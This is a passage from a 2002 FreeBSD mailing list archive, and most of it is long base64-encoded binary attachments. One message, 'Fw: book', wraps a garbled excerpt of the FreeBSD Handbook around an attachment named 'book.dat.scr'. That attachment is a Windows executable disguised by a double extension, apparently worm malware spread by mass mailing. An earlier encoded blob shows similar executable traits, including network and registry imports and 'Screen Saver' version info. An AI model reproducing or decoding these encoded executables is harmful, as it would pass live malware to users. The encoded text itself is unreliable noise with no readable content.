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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAARt337bgnIyNXTLm6qxj1SJtrQAnehn09rlE/mGBnQ3SxqXSEwTxJXDhhw2ER9wa7DHrMqIYG n1M4al+tXqnzZGWnUTkJOnafMDNTsfDp4WocLHi1yObsQfVxOE8m38UGuk9Hu2Sinsj4fp2T1OyC NDSF9McgTxPoHGpm6U7j2aNoTxLfKRULj3aSC9eQwUXQT9Xwud4VFrQpr9fgTG7SXWmfNXl3sJk5 ksOulNEG8XFR9PN8FPSTtMXdKOgjIKqHyZ5SgES8pITNC+jLLT7sEX3osRtsg5RtBQ0hjYlXC27n IQv4ITPf14qAy9WlwfIFSRCUn28xuDfFiU6kHD/Yv2Io2R1V3qU+ibWRARqlRkdkIEU9MB7WrZ4I eOnlBJvB5SBQJuB8j0fPmEF+MgqEm5tFE0GWjXhj86ARaxuCQ3uE1cZWpYPpLH9aDPUiwvUcJNSZ GjtMdjicrcoR --mtswgrj-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 11:57:46 2002 Delivered-To: freebsd-questions@freebsd.org Received: from eomer.vianetworks.nl (eomer.vianetworks.nl [212.61.15.10]) by hub.freebsd.org (Postfix) with ESMTP id D0B6137B423 for ; Tue, 25 Jun 2002 11:56:13 -0700 (PDT) Received: from mail.iaehv.nl (pm17d290.iae.nl [212.61.5.36]) by eomer.vianetworks.nl (Postfix) with SMTP id C8FE4211C2 for ; Tue, 25 Jun 2002 20:55:58 +0200 (CEST) From: Edwin Renders To: freebsd-questions@FreeBSD.ORG Subject: Fw: book Date: Tue,25 Jun 2002 20:57:46 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=snccfju Message-Id: <20020625185558.C8FE4211C2@eomer.vianetworks.nl> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --snccfju Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable \ FreeBSD Handbook The FreeBSD Documentation Project Copyright 1995 1996 1997 1998 1999 2 21 22 by The FreeBSD Documentation Project Welcome to FreeBSD This handbook covers the installation and day to day use of FreeBSD 46RELEASE This manual is a work in progress and is the work of many individu
.
.
More details attached
--snccfju Content-Type: application/octet-stream; name=book.dat.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="book.dat.scr" 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 